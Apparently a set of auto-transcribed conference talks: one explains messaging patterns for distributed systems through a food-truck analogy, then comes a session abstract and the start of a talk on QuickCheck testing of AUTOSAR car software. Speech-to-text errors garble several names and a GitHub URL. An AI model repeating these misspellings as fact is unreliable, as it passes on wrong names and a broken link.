That assumes that there's just one person coming every two and a half minutes. But if there's anything we know about human behavior, it's that there's never any order in behavior. It's just chaos. So of course people get off on their lunch break at 12 o'clock or 11 o'clock or 1 o'clock and they go to lunch. Well, that's everyone showing up at once. So I might not even be able to do 24 orders per hour. It might be much less, it might be like 15 or 14, because everyone comes at certain times, and I have this person out here that says, why is the line so long? What's going on here? I'm just going to walk away. And we do this as well, right? You might go to the coffee shop, you open the door and you see the line is long, and you think, I'm really not that thirsty. And you close the door and you walk away. That's lost revenue. So the same things we see in real life, again, are going to apply to the virtual world. So latency is going to equal someone walking away. So one solution could be to just hire more workers. We could try something like, let's just scale out. That is, let's have another window with a guy that does everything as well. But that would just double my throughput. If I just had two identical food trucks, that would at most double what I could normally do, but it still doesn't really solve my original problem. So what you see people do here in restaurants and other human processes that can be broken down into a series of steps is, instead of having one person do everything, you have each person do one step. This is exactly what came around from Henry Ford and the assembly line. Before Henry Ford, everyone manufactured cars one at a time. In fact, the advertising of the day was built around look how awesome and how great our craftsmen are at building cars. They would show videos in the newsreels of look how hard it is to build our car. But of course, they can only build one at a time. So what Henry Ford did was say, let's break this down into a series of steps and have each step done by one person, and I'll optimize each step. This is what we're going to do here. Instead of having just two people do every job, how about I have each person do just one job and have each of them optimize their individual step. What I find here is that some people, if they're just doing one job, can do it a lot better. The grill person, for example: how many items can I grill at once? However many can fit on the grill. So for the grill person, even though each individual item takes 100 seconds or whatever I put in there, 120 seconds or 110 seconds, yes, each individual one will take that long, but I can do a lot more at once. So the grill person may no longer even be the bottleneck, but I wouldn't know this until I broke it up into each individual step here. So now the bottleneck in this system becomes ordering, because that's the one synchronous part in this entire system. When a person comes up to order something, they're waiting, and the cashier is waiting for them to be done with the order. But with this optimization, it's not just quadrupled my throughput, but whatever 120 divided by 24 is. That's what I was able to get up to, because I was able to break each individual piece down and have each of them do orders in parallel now. So now my bottleneck is just the number of orders I can take per hour. And on the back end, it can handle that throughput. So I think I had it as: taking an order takes 30 seconds. So that's where I got that number.
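(A rough in-process sketch of that station-per-step idea, using .NET's BlockingCollection as each station's queue; the station names and timings come from the example, everything else is invented, and a real system would use durable queues rather than memory.)

    using System;
    using System.Collections.Concurrent;
    using System.Threading.Tasks;

    class Station
    {
        // Each station owns its own queue of work and runs independently.
        public BlockingCollection<string> Inbox { get; } = new();

        public Task Run(string name, int secondsPerItem, BlockingCollection<string>? next) =>
            Task.Run(async () =>
            {
                foreach (var order in Inbox.GetConsumingEnumerable())
                {
                    await Task.Delay(TimeSpan.FromSeconds(secondsPerItem)); // simulate the work
                    if (next is null) Console.WriteLine($"{name}: order up! {order}");
                    else next.Add(order); // drop it on the next station's counter and move on
                }
            });
    }

    class FoodTruck
    {
        static void Main()
        {
            var dress = new Station();
            var grill = new Station();
            var pack = new Station();

            _ = dress.Run("dress", 10, grill.Inbox);
            _ = grill.Run("grill", 100, pack.Inbox);
            _ = pack.Run("pack", 10, next: null);

            dress.Inbox.Add("cheeseburger for Jimmy"); // taking the order is the only synchronous part
            Console.ReadLine(); // keep the process alive while the order flows through the stations
        }
    }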
That is, basically, if one order takes 30 seconds to take, then an hour divided by 30 seconds is 120 orders. And you'll see this in restaurants: they're highly optimized to take orders. And Starbucks is the same way, right? You go to the coffee shop, they take the order, and then you see these people over here sort of milling about on the other side. Now, there are some complications to this model. In our original model, everything was synchronous, in that the person didn't walk away from ordering until they got their food. So they had the guarantee that, I know as a customer, I'm not leaving until I get my food. With this model, though, because it's a series of steps, the customer just has to sort of trust and sort of mill about on the side over there, under the assumption that eventually I will get my order. This is how most e-commerce systems work, right? It's not like when you go to Amazon.com, you hit submit order and there's a series of oompa-loompas or something that run off and start grabbing things off the shelves, like, oh god, we've only got two seconds before the page loads, we'd better go procure all these shipments. It doesn't work that way. So we have a long-running process to be able to deliver those items to our customers. But this does have extra complications. Again, our transaction is no longer synchronous, so that means if something goes wrong, the user doesn't have immediate feedback. They've got to have somewhat of a back channel to be able to do that. We have the issue of just putting all the pieces together. I watch this show in the States called Kitchen Nightmares; it's with this chef from the UK, Gordon Ramsay, who specializes in yelling at people and telling them how much they effing suck, and that sort of thing. And over and over again, when he goes into these restaurants, the key problem they have is a lack of organization. They just don't know how to organize their work. So in order for us to be able to build systems that have organized work, we have to decide up front, because we have to write that code. So we do have to decide what step does what, and individually we know what responsibilities go with each. Now, when we have a system like this, now that we have multiple people doing multiple things, how do people solve that in the real world? Well, it's messaging. They use verbal, nonverbal, durable, non-durable, synchronous and asynchronous messaging in order to fulfill this whole operation. So let's see how messaging can help solve this problem and apply it to our e-commerce website. Let's look at the very first interaction, which is the customer placing the order. In this interaction, this is going to be a synchronous communication. When I'm coming in to place an order, typically a customer doesn't want fire and forget, so it's not a one-way message. I need to get some sort of confirmation back that yes, indeed, you have received my order. You don't typically see someone just yelling out an order and walking away, like, okay, am I going to pay for it? That sort of thing. So it is a blocking operation. That's okay, though, because the customer expects that experience. They don't expect a fire-and-forget message where I go in and I submit an order and then I wait for them to come back to me. In this model, they wait to make the payment and get confirmation that yes, you have successfully placed your order, now go stand to the side. So this is going to be a synchronous affair here. It's also non-durable.
So the order is requested verbally. This is also the most efficient means of doing so. It would be kind of lousy if we forced our customers to write down the order and then hand it to us. Like, am I doing the work for you there? I mean, that doesn't make any sense. So if we want to have a really highly efficient ordering process, non-durable would be the way to go here. We do run some risk, though, in that if something goes wrong with taking the order, then I don't have any record of it. Right? If you go to that website and you hit post order and something goes wrong, you get that yellow screen of death, and then you want to resubmit and you're like, huh, did they charge my credit card or not? I don't know. So it does run some risk there. But in any case, both the cashier and the customer are blocked from doing anything else during this interaction. And I can only take one person's order at a time, and so everyone gets in line. So in our messaging world, we might model this as an HTTP request. This is all just pseudocode; I don't know if it's even actually real HTTP, but you get the idea. And in this case, I'll post up to the order API my name and what I want to order. And what they'll give back is information. Now, the cashier is what dictates exactly what information they need. So they do tell me: I need your name, and what do you want? I mean, that's typical of what happens when you walk up to the cashier. What do you want? You know, they're telling you what the interaction is going to be here. So I can't just order any way I want to; the cashier is dictating this interaction. In this case, by posting up an order, I get an HTTP 201 Created response on the way back, and a location of where to go see the status of my order. In all of these sorts of offline processing systems, you typically see that I need some way to get back at what I've done, because I want to be able, as a customer, to see what the status of my order is. So in this case, I can give them back a link to say, here's where you can go find out about the status of your order. Of course, Amazon does this, right? You place an order and it says your order number is this, and click this link to go see the status of your order. And you can click that at any time. So that's kind of the easy part, just the first interaction. That's pretty much how the original model went. Now we have to figure out what to do with all these other people that are going to be involved in our process: dress, grill, pack, and deliver. So we have some choices here. Do we do durable or non-durable messages? Who figures out what the steps should be? Does every person individually figure it out; each time they get an item, do they figure out what the next step is? Or is that managed by someone else? When something goes wrong, how do we manage failures? And eventually we look at, too, how can we make this go even faster? So in our case, when looking at durable versus non-durable: if I go with non-durable messaging, that's equivalent for me to saying, in a website request, I'll go make a WCF call to something else that is then going to make the order. Well, that's, again, a non-durable transaction. That's non-durable messaging. So if something goes wrong, the message is lost. So I would likely want a durable message here. And we typically see restaurants do the same thing. They're not yelling out orders to the back.
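(The slide's pseudocode isn't in the transcript, so here is a hedged stand-in for the ordering interaction described a moment ago: POST the order, get 201 Created and a status link back. The URL and field names are invented.)

    using System;
    using System.Net;
    using System.Net.Http;
    using System.Net.Http.Json;
    using System.Threading.Tasks;

    static class OrderClient
    {
        // Synchronous from the customer's point of view: we wait for the confirmation,
        // but all we get back is an acknowledgement plus a link to check on later.
        public static async Task<Uri?> PlaceOrderAsync(HttpClient http)
        {
            var response = await http.PostAsJsonAsync(
                "https://foodtruck.example/orders",
                new { name = "Jimmy", item = "cheeseburger" });

            return response.StatusCode == HttpStatusCode.Created
                ? response.Headers.Location   // e.g. /orders/42, where the status lives
                : null;
        }
    }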
They're putting it on a piece of paper, or they're putting it in the computer, and that's something that is durable and is actually passed on to the next person. So in this case, I want to manage a couple of things. First of all, I don't necessarily want to have each person figure out what the process needs to be. So I will send a message to the first person to say, I want you to dress this, and this is the order I'm referring to. So just two pieces of information: one is the order that I'm referring to, and the other is what are the steps that need to be processed as part of this. And what's nice about this pattern is that at each step, they receive the message, they process it, and then just pass it on to the next person. So this is what you see happen in restaurants. They have a ticket, and sometimes you actually see the ticket physically move from station to station, and they just look at it and say, oh, this is my thing. Okay, done. Sling it on to the next person. So each of these becomes an independent process with its own queue in order to manage the list of work that it needs to go through. This pattern right here, where I have a list of places to send the message to, is called the routing slip pattern, because instead of each step knowing what the next step should be, I just include that in the message, so that there's one person deciding what the overall set of steps should be, and each individual worker doesn't make that decision. They just simply do their work and pass it on to the next step they see in the list. Because not everything needs to go through every single step. If someone orders a salad, it doesn't need to go to the grill. So it just goes to dress and pack. So there's no reason for me to pass that information on to the grill person; it's just a waste of time for them to look at it and say, this doesn't belong to me, go on to the next thing. You see this oftentimes with computerized systems in restaurants, where if you have multiple stations, only the orders that actually relate to that station show up on the screen. If there's something that doesn't need to be grilled, it doesn't show up, because that would just waste that person's time looking at something that has nothing to do with them. So with the routing slip pattern, I can decide up front what my steps should be, and then my individual workers can be a lot dumber and just do their work and pass it on. So you'll see this done very often. Oh, I had two options as well here. So you can see here that my order is not actually inside the message. I'm including a link to the actual order, like what the person actually ordered. So you'll see that sometimes as well, that the ticket is just a number, and the actual instructions are delivered through a different mechanism. Sometimes I do see that the actual physical thing that goes from place to place also includes the instructions for the order. We have a burger place in Austin, Texas called Mighty Fine, because they have mighty fine burgers. And they have this interesting process in which the order, what you want, is written on a paper bag. So it's upside down because the cashier is reading it from that direction. So you as a customer write your name on it, and as you say what you want, they'll circle things on the bag. So in this one, they're getting a burger, it's a cheeseburger, it's red, which means it has ketchup, and they're getting french fries as well. So the instructions are also included on the message itself, the message being the bag.
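(A small sketch of the routing slip pattern described above: the remaining steps travel with the message, and each worker does its own step and forwards the rest. Names are illustrative.)

    using System;
    using System.Collections.Generic;

    // The message carries a link to the order plus the steps still to be done,
    // e.g. ["dress", "grill", "pack"] for a burger or ["dress", "pack"] for a salad.
    record WorkTicket(Uri OrderLink, Queue<string> RemainingSteps);

    static class DressStation
    {
        public static void Handle(WorkTicket ticket, Action<string, WorkTicket> sendTo)
        {
            // ... do the dressing for the order behind ticket.OrderLink ...

            if (ticket.RemainingSteps.Count > 0)
            {
                var nextStep = ticket.RemainingSteps.Dequeue(); // "grill" or "pack"
                sendTo(nextStep, ticket);                       // drop it in that station's queue
            }
        }
    }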
It's also the delivery mechanism for the order. So they'll put the food inside the bag and pass it on to the next step. So it goes to the grill step first, they put the burger in the bag; it goes to the fry step next, they put the fries in the bag. So we could do that as well. We could continue to augment our message as we pass it along with the results of what we've done, or we could do something like just include a link, and we actually go back to a database or something to do whatever we need to do with that item. Both options are equally viable; it just sort of depends on how you want your process to flow. The plus side to this approach is that there's no shared state between processes. No one's fighting over bags. When they have the bag, it's theirs and theirs alone, so there's no such thing as concurrency problems in this model. With a shared-state model, that's equivalent to somewhere where there's one bag that everyone has to go through, and maybe the burger and fries get done at the same time, so they're fighting over bags. So in this model, it's nice that there are no concurrency problems, no deadlocks; everything is localized to the bag. It is a little bit more difficult to deal with, because if someone orders a lot of food, my message could get big, and that could be difficult to transport. So if someone orders 20 burgers, it's not going to work to stuff that all in one bag. But either way, my message flows from point to point. It goes to the dress station first, queues up there; goes to the grill station next, queues up there; goes to the pack station next, queues up there. When packing is done, of course, they'll go ahead and yell out, order up, and they're done. So yes, a queue for each step. Asynchronous, durable queues to make sure that I can recover from failures. So if I drop a burger, I don't lose the message; my bag's still there telling me what to do. So I have some history of what's going on there. This as well: whenever I pass the bag on to the dress person, I just drop the order on the counter next to them. I don't tap them on the shoulder: hey, I got an order for you. Here you go. You got it? Okay, good. I'm walking on then. No, I just drop it to the side. I can go back to taking orders. So with asynchronous messaging between these different points, I can minimize the amount of time communicating between each individual process and maximize my time actually doing work. And of course, each different station gets to decide how it does the work it's doing, so independence is maintained, and I can scale up each of these individual stations as well. If I need to have two people doing dressing because that's getting bottlenecked, I can do that. I can actually have the pack person come over and go on to dress. In our systems, though, it's pretty easy for us to just scale up. I can just throw more threads or cores at something and go that way. So we can do that in our system as well. Now that I'm broken down into individual steps, it's a lot easier for me to scale up those individual pieces. So this is about as fast as I can get right now. If I want to get any faster, the way people typically do this is to start to relax guarantees. So my current bottleneck is taking orders, right? I can only process as quickly as I take an order. So how can I make that go faster? One thing I can do is notify the back people before a new order is actually completed.
You will see this in restaurants sometimes. You order something, and before you pay, they yell out to the back, burger up, so someone in the back can actually get started on your order immediately. So you're not waiting as long at the end. In this case, because we're just yelling out before the person has actually paid, what's the problem? Well, what happens if they don't pay? What happens to that burger that I started? Well, the same things we do in real life we could do in our system. We could just eat the cost, the cook eats it, I don't know; they just don't worry about the burger that got made and is down the line. We could have a compensating action: we send another message to say, oh, cancel that burger, and have them cancel that order. Or we could basically ignore it. We could retry it; if something goes wrong, ask, did you get that burger? So those are basically our three sorts of options there. So with this one, I can start yelling out orders more quickly, and hopefully that gets people's orders out the other side more quickly as well. And for that case, I would use a non-durable asynchronous message, because I'm not certain that it'll go through okay. Whether or not they catch it, they're still going to get the original order that comes through on the paper bag down the line. But if I can yell earlier, maybe it helps them get started a little bit quicker. Now, this is sort of a last-resort thing. If I really want to optimize my throughput, I start to do these things of relaxing guarantees and saying failure is the exception. In these cases, I may not have to have such hard guarantees, but I have to look at those individual situations each time. I've noticed as well that some websites that have you go through a series of steps will often sort of pre-validate things as you go. One example we had was an e-commerce website we were working on that had step one, you put in your information, your payment information; step two, you put in your shipping information; step three, you confirm; and then you finally place the order. What they would do, though, is after you went through step one, they wouldn't synchronously verify your account. It was asynchronous, so they would send a message to say, okay, it's going to take them a little bit to fill out their shipping information; let's go ahead and have the payment processor pre-validate this, so by the time I get to confirm, I should have an answer back. They're not waiting when they hit submit: oh, God, I've got to hit the payment gateway and wait for that response to come back. We definitely see that sort of thing done in the systems we build. So that is our process for actually processing orders. It went from just one guy doing every job to a bunch of guys doing a bunch of different jobs, and I had to introduce some new patterns in each of these places in order to actually fulfill this order. I had to introduce non-durable synchronous messaging from the customer to the cashier, and then I had to introduce durable asynchronous messaging for all the other steps. The last thing I need is to actually deliver my order at the end, and that's why I asked for the person's name. I asked for the person's name because I have to have some way to let them know at the end that this is your order. That name is just a correlation identifier between all those different steps, in order for us to actually be able to fulfill the order at the end.
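(A sketch of that correlation idea: every message about the same order carries the same identifier, including the compensating cancel message. All the names here are invented.)

    using System;

    record OrderAccepted(Guid OrderId, string CustomerName); // the name or id ties the steps together
    record OrderGrilled(Guid OrderId);
    record OrderPacked(Guid OrderId);
    record CancelOrder(Guid OrderId, string Reason);         // compensating action if payment falls through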
In a lot of our systems, we have natural correlation identifiers like transaction IDs or names. Sometimes we have to make one up. In some restaurants you've been to, you've probably had to take a number, and your number signifies your order rather than your name, because two people might have the same name, so you may have some ambiguity there. So that is the write side. The write side is actually changing information, creating an order, and delivering it on the other side. Let's look at our reads, because reads are often the things in a distributed system we sort of forget about, and we have the same sorts of constraints and problems on this side that we would also see in the real world. The reads in my system, in the food truck here, are going to be around reading the menu, of course. A person goes up and reads the menu. This reading is actually really cheap. It's practically free to read the menu. There's no cost for me to look at the items on the list and then order something. We also see that that menu is built specifically for the customers. It's built to inform them and help them decide on what they want to eat, and maybe to entice them: look at this, don't you want to buy these extra good items, things like that. The design of that is not built around how I as the owner want to manage the menu. It's built around selling and providing a menu for the customers. I as the owner of this business am not using that board outside to manage the menu. I've probably got Excel or maybe an Access database in the back end to actually manage what items I'm going to sell. All the business rules about what I'm selling when are probably in that system. I might have analytics as well to say how well is this thing selling versus that, to tweak and figure out what I should promote over others. I might have marketing involved to figure out, on Friday we're going to have this sort of special. But when I come in as a customer, I don't know that. I just see the sandwich board. How that came to be, I don't know. I don't care. But gosh, it sure is easy to read that board. This is not how I typically see systems built. Systems are typically built with the same backing store managing both the back-end concerns of business rules, management and forecasting, and the front end, which is just reads. There's no page on the site that allows me to change the product name. Yet if it's going against the same backing store as all the management of information, then I'm probably trying to solve two different problems with the same database, which can be problematic. The picture I typically draw for customers is that this is equivalent to, instead of having that sandwich board out front, me putting the Excel spreadsheet out there. Saying, hey, you want to order something? Check out my management tool to see what items I have. I've got effective dates on those prices, so ignore the ones that aren't for this day, because those prices are effective next week. I know it's cheaper next week, but you'll just pay more today. This is trying to use the same model to solve those two very, very different problems. It's also more expensive for me to load up Excel, of course. It's more difficult to do. Likewise, the management applications I typically see are built around managing individual items, not showing and displaying lots of items like I typically see in e-commerce applications. And the front end needs to support things like search. SQL Server is horrible at searching. It's absolutely awful.
We'll often see people use different technologies for the front end to be able to search things effectively, things like Lucene, Solr, things like that, which are much, much better at searching. People just wouldn't dream of doing the equivalent in the real world, yet I see people saying, yeah, I'll just wildcard search SQL and cross my fingers that it actually comes back. I probably would want two very different solutions to handle those two different things, because this guy that comes up to see the Excel document is just like, I don't know, this is taking forever, I don't want that. I just want a very nice, clean look at my menu. A better solution here would be to have tailor-made data stores for those two very different concerns. Well, there's a talk actually right before this that was on a topic very, very similar to this, looking at how there are typically two very different kinds of things that happen to my system. There are the commands that affect state, that change state, and then there are the reads that don't affect state; I'm just reading information, I'm not changing anything. The concerns of those two things are very, very different. They have very different heuristics in how the applications typically work with them. In the back end, I may only be working with one product at a time, and they don't care about viewing all the products, whereas the front end is all about speed and seeing all the products at once. The trick, of course, is that middle part. What is that middle part? Is it replication? Well, replication means I get a copy. That means whatever management tool my back-end guy uses, Excel, they're just getting a copy of that Excel document. That really doesn't get me anything nicer. It's still a model built for the back end; I just have a copy of it on the front end. It could be an option for simple models. But because this is a separate process, a separate database, I could build something tailor-made for what the front end does and have a read-optimized model. People call this a lot of things. They call it view model databases. They call them reporting models. I usually call it a reporting model for my customers, because as soon as I say cache, they're like, what, it can't be stale. Well, the world is stale. The sun could have blown up eight minutes ago, and we would just find out now, because it takes eight minutes for the light to actually reach us from the sun to the earth. When someone views a website, it's immediately stale. It's not updating in real time, unless you're using SignalR, I guess. But no matter what, it's going to be stale information on the front. And a lot of times, the e-commerce companies I work for prefer it that way. They don't want real-time pricing, unless it's an oops, like, oops, I misplaced the decimal, and what was $100 is now $1, so there's always an emergency path. But typically, back ends say, I want this price effective on this date. So even delivery of those prices to the front end is managed very specifically. The e-commerce company I worked for that did the whole nine-minute response time, the way they managed it was just a nightly ETL job that took the pricing information from the back-end mainframe and pushed it into a database on the front end. Like, yeah, okay, and all the product owners knew that.
So they knew that I could muck around with prices all day long, knowing that it's not going to be seen until tomorrow. As soon as you go to this model, though, prices are shown immediately, unless I do extra features to be able to support future prices and things like that. Okay, so looking at the menu here, ideally, I'd have the product owner doing, or the business owner doing his management in his own application, however he wants to do it, and then I can optimize my front end to be able to have whatever data it needs. So you see this, right? The owner will have his Excel spreadsheet on his laptop that he manages the menu, but for a menu from the customer's point of view, it's just that front end board there. So it's cashed, it's as close to the customer as possible, and it's highly efficient to read from that. And yes, it's stale, but that's okay because no money is lost for it being out of date from when. It's like the second the business owner hits Enter on Excel, it's got to go like real-time update in the back end, things like that. So the picture I often show here is that when you go to restaurants and catalogs and things like that, they're making a trade-off saying, I can ship 1,000 catalogs to 1,000 people that has completely free reads, but it's going to be stale. So it's free to read, but it's not stale. The existing system they had with the nine-minute response time, they're making real-time calls to the processing and pricing services to figure out prices. So they'd ask for, okay, what's the price of the product? Okay. What's the price of the product? I just told you, it's this again. And they make those calls. And I told them this is equivalent to when someone walks up to the cashier, you have to call someone to ask what the prices are, wait for them to get back to you, and then give the response back. What you want to do is to have that information local right next to you to be able to show to people for absolutely free and just trade off a little bit of staleness over that course. And they're okay with that in the real world. This is obviously how no one would ever have to call us to central office to have prices. Yet in the systems I see, I often see these WCF calls to pricing service, like, do you realize what you're doing here, right? You're making calls to someone to see what the price is, and it probably hasn't changed since you last called them two seconds ago. Just something to think about. Now the key here though is that no one can change the menu. The menu is not owned by the restaurant, it's owned by the product owner or the business owner. So no one can go ahead and just like add new items and change prices willy-nilly. It's still driven by the business owner. But that's nice though. If we know that it's immutable data, that is, someone else owns it and we can't change it based on rules that we have, then we can optimize our storage for being able to display to people. So in the real systems I work on, like, if it's immutable data, I have no problem denormalizing it because if it's not changing, I don't have to worry about updating a lot of rows for this information that either never or very, very rarely changes. So in e-commerce systems I work on, I often make, you know, if it's ordering something, I'll just go ahead and pull the product name and the product price and store it in the order or store it in the cart because that's cheaper than me having to go back to that service every single time. 
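As a rough sketch of that kind of denormalization (all type and member names here are invented for illustration, not taken from the talk), copying the name and price into the cart at the moment the item is added might look like this:

```csharp
using System.Collections.Generic;

// Hypothetical types for illustration only.
public class ProductReadModel
{
    public string Id { get; set; }
    public string Name { get; set; }
    public decimal Price { get; set; }
}

public class CartItem
{
    public string ProductId { get; set; }

    // Denormalized copies captured when the item is added; the catalog still
    // owns this data, the cart just keeps a snapshot of it.
    public string ProductName { get; set; }
    public decimal UnitPrice { get; set; }
    public int Quantity { get; set; }
}

public class Cart
{
    private readonly List<CartItem> items = new List<CartItem>();

    // Copy the fields we need from the local read model instead of calling a
    // remote product/pricing service on every add, view and checkout.
    public void Add(ProductReadModel product, int quantity)
    {
        items.Add(new CartItem
        {
            ProductId = product.Id,
            ProductName = product.Name,
            UnitPrice = product.Price,
            Quantity = quantity
        });
    }
}
```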
And we ask the business, like, oh, what if the name changes to the product? Like, really? I mean, usually these things are driven off feeds from all sorts of other people. That doesn't change. There's not that many typos that go in here. So if there's a typo, well, we'll just wait for the nightly update or whatever and you'll be fine. So even though the data is duplicated, ownership is preserved. So the restaurant does not own the menu, it's the business owner that owns the menu, they just own the delivery of that menu to the customers. But if something does change in the menu and I want to notify the front end that something has changed and they need to update the prices, this is where we can see PubSub come into play. So I might have that there's some menu updated that I need to notify the store to say, the price now is on Tacos is $1.49. I could have these menu updated events being granular, that is, for each time an item is updated I let them know. Or it could be an all at one sort of thing, that I just ship them, here's the entire menu, have at it. And I see a lot of these systems that are built around mainframes do that. They'll just have a flat file dump of their product catalog and say, I don't know what's changed but, you know, go figure it out. The reason why this model is nice is that as soon as I have more than one store, I don't have to manage all these different menus at once. Whenever something changes in my menu from all the different stores I have out there, I just send all those updates to all the different people and I don't have to have them calling into me, what's the menu, what's the menu, what's the menu. Whenever it changes, I let them know. And they don't have to poll me to say, hey, has anything changed since the last time I called you an hour ago? I see people typically try to solve it with caching. Caching still assumes that it just goes stale after a certain amount of time. With PubSub, I can notify you when it's changed so you don't have to keep polling me to figure out when things have changed. It's durable, of course, so I'm not going to call them and just verbally tell them. I'm going to give them price sheet and the menu sheet and send out to the other people. And as I bring more stores online, it just becomes a matter of emailing or faxing, if my God, if they still do that, to all those people that need the new menu and it just goes out to all of them. The other nice thing about this, of course, is if Store A closes, Store B and C will still receive their menu. So they don't have any, you know, don't really need to know about any other stores that are there. They just care about their specific menu and they can get what they need. If anything gets delayed at the delivery from one store to another, then again, it doesn't affect the delivery from, you know, if the Postal Service messed up delivering the menu from the business owner to Store A, well, that doesn't affect the menu delivery to Store B. So I don't have to worry about individual stores competing with each other. So, some parting thoughts. When we're thinking about building systems that need to communicate with more than one process, as soon as we cross that gap from synchronous one thread for one request and start building up into and breaking these things out into other systems, we have to keep in mind the same constraints we find in the real world also apply to the systems that we build. The only thing that's changed is that latency is shortened, but it's not zero. 
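Circling back to the menu updates for a moment, a minimal sketch of that publish/subscribe side might look like the following. The event and handler types are invented; in practice the plumbing would be a durable broker (MSMQ, RabbitMQ, Azure Service Bus) driven by a framework such as NServiceBus or MassTransit.

```csharp
using System;
using System.Collections.Generic;

// Invented message type: the business owner publishes this when a price changes.
public class MenuItemPriceChanged
{
    public string Sku { get; set; }
    public decimal NewPrice { get; set; }
    public DateTime EffectiveFrom { get; set; }
}

// Each store subscribes and updates its own local, read-optimized copy of the
// menu; it never calls back to the owner's system to ask what the menu is.
public class StoreMenuProjection
{
    private readonly Dictionary<string, decimal> prices =
        new Dictionary<string, decimal>();

    public void Handle(MenuItemPriceChanged message)
    {
        // Stale until the next event arrives -- and that's acceptable here.
        prices[message.Sku] = message.NewPrice;
    }
}
```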
So the same sort of problems that we have of, I call someone up and expect them to reply immediately, but if they don't pick up, then I'm just blocked, this is the exact same sort of thing we see happen in virtual systems as well. I also will, it's kind of, I've been doing messaging for about five years now, and I still can't go into a restaurant or a business without looking around and trying to figure out how I might design this human process with messaging because it's so in your face what's going on that I like to go and look at those things because those solutions that I see people using in the real world, I can just take those exact solutions and apply them to what I'm doing in the virtual world. Now the way this all goes together of course is with messaging. That's how we need to cross these bridges between these two things. But it's just important to keep in mind that there's no one solution for all of our messaging needs and depending on the picture we want to draw, the interactions between our different processes, that'll be the solution that we decide for what kind of messaging pattern and style we'll use. So thank you very much. All these slides will be on my GitHub, github.com.com.au. And thank you very much and enjoy lunch.
|
So you've decided to try messaging. You've built distributed systems before - everyone's called a web service, right? You've looked at MSMQ, RabbitMQ, Azure Service Bus or ActiveMQ. But where do these technologies fit in? How will working with asynchronous, durable messages change the way you build applications? And most importantly, what about the UI? Luckily for us, messaging is a problem already solved centuries ago. It's just up to us as developers to use real-world metaphors to guide the building of our systems. In this session, we'll look at telephones, postcards, magazines and more to see how messaging patterns perfected through human interaction can be leveraged in messaging systems. We'll also look at complex processes and how organizations large and small can collaborate on complex tasks, and how we can model them in our systems. Finally, we'll see where messaging sits in the overall space of distributed systems, where it fits and where it doesn't, just like we as humans have evolved our communication over the millennia.
|
10.5446/51443 (DOI)
|
Can you hear me? Great. Okay, so for those who don't know me, my name is John Hughes. I'm a long-time functional programmer. I've been a professor at Charlottes in Gothenburg for many years. And in recent years, I've become very interested in testing. And I have a company called Cubic that works with that. What I'm going to tell you about is the biggest project that we've done so far at the company. I think it's quite exciting. So what's it all about? Well it's about the software that goes into cars. So as we all know, cars contain lots of processes nowadays, between 50 and 100 in a modern car. And so there's lots and lots of software in them. And because there are lots of different processes, lots of different components, then it's a concern that all of those processes can actually talk to each other, that the software in the different processes is compatible. And this is quite a problem because for a car maker who puts a car together, the maker will buy lots of subsystems. They'll contain multiple processes. They'll contain software from different suppliers. And of course the suppliers will all have confidence in their own software. But when you put the car together, guess what? It may not work. And there's a risk of an integration nightmare at that point. Especially since there are actually two tiers of suppliers. So you buy the hardware from one supplier and then the software from somebody else. So there's a lot of different software in the car. Okay, so what's the solution to that? Standardization. And there is indeed a standard that's called Outisar, Automotive Open System Architecture, which is developed in cooperation by pretty much every company you can think of in the vehicle industry. And that specifies how vehicle software ought to be built. Now what we've been working with is just a part of that. Outisar covers every aspect of developing software for cars. But a part of it is what's called the Outisar basic software, which is supposed to run on every processor in the car. And I've got a diagram of it here. It consists of a number of clusters. You'll recognize Ethernet. So there's an Ethernet stack. The CAN bus is a bus that's very commonly used in cars. FlexRay and Linn are two other communication protocols. Common services provides routing between all of those protocols. And the diagnostic cluster is the thing that records fault codes when something happens as you drive so that the garage, the service station can find out what happened when they serviced your car. So all of this stuff is supposed to run on every single processor. What does the picture show? Well, those little colored boxes that say things like COM and PDUR, those are individual modules or individual components. And they're clustered together in these clusters. And one of those components, just one of those little boxes, is described by a PDF that can be a couple of hundred pages long. So there are literally thousands of pages of specifications for this stuff. Now you would think, would you not, that if this software is going to run on every processor, it would make sense for the entire industry to get together and build an open source implementation that would be the same and very, very well tested. Isn't that what you would do? Is that what they've done? No. No, what's happened instead is they've standardized how these components are supposed to behave. And then there are many competing implementations. 
And the problems can arise when two different implementations make different interpretations of the standard. Then you try and get them to talk to each other, and they just can't. And you maybe can't even tell whose fault it is. So we got involved in this because Volvo cars were concerned about the integration problem. And they want to even to be able to do things like say, well, we'll buy basic software from one supplier, but maybe we don't like their CAN stack. Let's take it away and put different suppliers CAN stack there, because we think it's better. Of course you should be able to do that. It's all standardized, it should all just work. So that's the theory. The whole idea behind this standardization is that car manufacturers should be able to pick and choose from the suppliers and make them compete with each other. And by doing so, get better products and better prices. But guess what? It doesn't always work. Or perhaps I should say it never works. So what happens instead is the system integrators, the car builders, they go through this nightmare of trying to get all of the software to work together. And if they buy all the software from the same supplier, of course, then it's the supplier's fault and they have to solve the problems. But Volvo don't want to do that. They want to pick and choose. And that means it's Volvo's problem when it doesn't work. So what was their plan? Well, their plan was before buying any of this basic software, get it certified. Who are S-Pay? S-Pay are the Swedish certification agency. They're like TUV in Germany. So Volvo's plan is only to buy software after S-Pay certifies that it conforms to the standard. That's great. How on earth can S-Pay tell? Well, because they will run tests developed at Qwik, our company. So that's where we come into the picture. How on earth do we think we can develop tests that will catch any deviation from the standard? Well, we're going to do it using a testing tool called QuickCheck. And this is something that Kuhn Klassen and I came up with back in 1999 in Haskell. So it draws very much on functional programming ideas. And Qwik, the company, was founded to market a version of QuickCheck in Erlang in 2006. And that's when I took one foot at least out of academia and stepped into the industrial world. And since then, I've spent a large part of my time trying out QuickCheck to do all kinds of challenging testing and having a whole lot of fun. So I've told you the name of QuickCheck, but what does it do? Well, we take or we write a formal specification of the API that we're going to test in a special form. And when we've done that, we generate random sequences of API calls. And we run those tests and we see do they conform to the spec. And we keep doing that until eventually one of the tests will fail. So this kind of random testing, it will try all kinds of combinations that you would never think to write a handwritten test case for. And as a result, this is a very, very good way to provoke errors that otherwise could remain undetected. But once you've found a test case that fails, these test cases, they can be 100 calls long. So they're very hard to diagnose. Usually though, the problem just depends on a few of the calls and the rest are not relevant. So the next thing that QuickCheck does is figure out which calls those are and boil the test case down to a minimal failing example. And those are the ones that we then try to debug. And so you get very effective testing by the random generation. 
